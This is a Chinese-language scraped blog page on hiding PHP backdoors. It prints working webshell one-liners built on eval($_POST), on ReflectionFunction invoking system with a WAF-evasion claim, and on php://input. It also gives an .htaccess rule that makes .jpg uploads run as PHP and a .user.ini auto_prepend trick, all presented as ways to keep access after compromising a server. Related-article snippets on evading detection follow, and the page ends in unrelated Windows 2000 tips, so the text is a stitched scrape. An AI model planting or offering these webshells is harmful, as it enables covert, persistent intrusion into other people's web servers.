php后门隐藏技巧

一句话 and 大马

phpspy  菜刀一句话<[email protected]($_POST[‘cmd‘]);?>

反射后门

<?php

$func = new ReflectionFunction($_GET[m]);

echo $func->invokeArgs(array($_GET[c]));

?>

调用如x.php?m=system&c=whoami
后门也可绕过某些检测禁用system函数的防护系统

php:input

php://input是用来接收post数据(这里有php://input的介绍)

<?php

@eval(file_get_contents(‘php://input‘))

?>

Post提交 system(‘whoami‘);

.htaccess(需webserver支持)

可以设置任意后缀也可以设置UTF7编码格式shell

AddType  application/x-httpd-php     .jpg

然后再传一个JPG结尾的shell,访问即可执行了

.user.ini(需fastcgi配合)

动态修改php.ini配置文件

User.ini

auto_prepend_file=demo.gif(准备用php://input呢 测试不成功 不知道为何)

时间: 2024-08-12 14:56:06

php后门隐藏技巧的相关文章

PHP后门隐藏与维持技巧

在一个成功的测试后,通常会想让特权保持的更久些.留后门的工作就显得至关重要,通常布设的后门包括但不限于数据库权限,WEB权限,系统用户权限等等.此文则对大众后门隐藏的一些思路做科普. AD: 0×00前言 在一个成功的测试后,通常会想让特权保持的更久些.留后门的工作就显得至关重要,通常布设的后门包括但不限于数据库权限,WEB权限,系统用户权限等等.此文则对大众后门隐藏的一些思路做科普. 以PHP-WEBBACKDOOR为例,抛砖引玉 一个最常见的一句话后门可能写作这样 <?php @eval($

黑客窃取企业数据的后门程序技巧

后门程序可让黑客从任何网络遥控缺乏防护的计算机,包括公共网络.家庭网络或办公室网络.通过一些所谓的后门程序技巧 (也就是后门程序所做的工作),黑客就能暗中下令计算机窃听用户在线聊天内容.连上受感染的网站.复制密码等等. 当 IT 系统管理员在计算机系统上发现后门程序时,很可能歹徒早已暗中搜集有关其网络的重要信息,也代表黑客早已准备进入锁定目标攻击流程的第三阶段,也就是建立其幕后操纵 (C&C) 通讯.如果继续照这样发展下去,黑客最后将偷到一些可让他们贩卖或用于其他恶意用途的信息. 为此,趋势科技

后门隐藏与维持技巧

运维直观寻找我们shell的方式有很多,如 通过文件名/修改时间/大小,文件备份比对发生异常 通过WEBSHELL后门扫描脚本发现,如Scanbackdoor.php/Pecher/shelldetect.php以及各种扫描器等等 通过Access.log访问日志发现后门所在 又或者,我们的测试的一句话还要被WAF拦一下,再来个警告日志,等等 方法: 404页面隐藏后门 (访问404) 变形的一句话 包含(文件.图片.错误日志) 混淆(代码层面)(修改文件时间.文件大小的伪装处置等等) 原文地址

润乾报表之行列隐藏技巧...

隐藏行.列: 思路:三个属性:[显示-->隐藏行列].[行属性-->可视].[行属性-->高度(列则宽度)] 基于多种报表类型组合,对应的处理方式也不一样 1.普通报表 && 可以填报 1.1:点击某行,在属性名称[显示-->隐藏行] 打√或者写入表达式if(你的表达式,true,false) 1.2:点击某行,在属性名称[行属性-->可视] 打√或者写入对应表达式. 1.3:点击某行,在属性名称[行属性-->高度(列则宽度)] 输入0.01 或者 0.

微信的7个隐藏技巧,真的很实用,不知道的可惜了

微信是很多人天天都在用的工具,在微信中,有很多实用的小功能,也有很多不为人知的隐藏功能.今天,就带大家来了解一下微信的隐藏功能,让你能够更加方便的使用微信. 1:红包捡漏 发红包是我们微信聊天的一种常见操作,碰到节假日,红包太多根本领不过来怎么办?打开正在发红包的群,点击右上角的“...”然后点击“查找聊天记录”,再选择“交易”,如果有没显示“已被领完”,那就证明还可以再领,学会这个技巧,就再也不用翻聊天记录找红包了. 2:微信表情包 在我们的日常聊天中,表情包可是我们聊天的润滑剂,一些可爱有趣

php一句话后门过狗姿势万千之后门构造与隐藏【二】

第二章节主要带给大家一些后门构造思路,与安全狗文件特征检测的机制. 另外强调一下,这篇文章需要大家对于php有一定的认识. 本章节分为三大部分,第一部分针对初级,分析菜刀php代码的执行过程,较基础:第二部分主要总结一些可以利用的后门姿势,这部分我主要给大家分享一些搜集的后门,希望可以拓展大家的思路:第三部分主要分享后门隐藏之道. 声明:在后门举例中大部分后门构造与思路,可能网上都有类似的,如有雷同,来打我呀! 目前主流的waf软件(如安全狗)一般对于后门文件有主动查杀与被动查杀,主动好理解,被

PHP一句话后门过狗姿势万千之后门构造与隐藏

第二章节主要带给大家一些后门构造思路,与安全狗文件特征检测的机制. 另外强调一下,这篇文章需要大家对于php有一定的认识. 本章节分为三大部分,第一部分针对初级,分析菜刀php代码的执行过程,较基础:第二部分主要总结一些可以利用的后门姿势,这部分我主要给大家分享一些搜集的后门,希望可以拓展大家的思路:第三部分主要分享后门隐藏之道. 声明:在后门举例中大部分后门构造与思路,可能网上都有类似的,如有雷同,来打我呀! 目前主流的waf软件(如安全狗)一般对于后门文件有主动查杀与被动查杀,主动好理解,被

研究人员发现绝大部分酷派(Coolpad)手机暗藏后门(转)

隐私问题被曝光得越来越多,随着物联网的发展,只会变得越来越严重,不过从当前看来 ,国人对隐私的重视度还远没有国外,期待加强对隐私的保护策略.   转自:http://www.freebuf.com/news/54486.html 网络安全公司Palo Alto披露,酷派安卓设备上存在搜集用户隐私数据的恶意后门程序.酷派是国内知名手机制造商(你常常会在办宽带.话费套餐送手机时遇到它),产品远销国外.研究人员认为,酷派公司在生产设备时故意在其产品中设置了后门. 绝大部分酷派手机存在后门 在移动安卓系

win2000罕见实用技巧集(二)

十五.在Windows2000中使用Windows98的收藏夹 ??要把Windows98下的收藏夹搬到Windows2000下,你只要把Windows98中的Windowsfavorites目录下的所有内容复制到Windows2000的documents and settingsadministrator(或其他用户名)favorites中,就搞定 . ??十六.Windows2000的“快速重启”与“唤醒” ??在Windows2000中,按Shift键不是快速重启而是取消重新启动.在“关机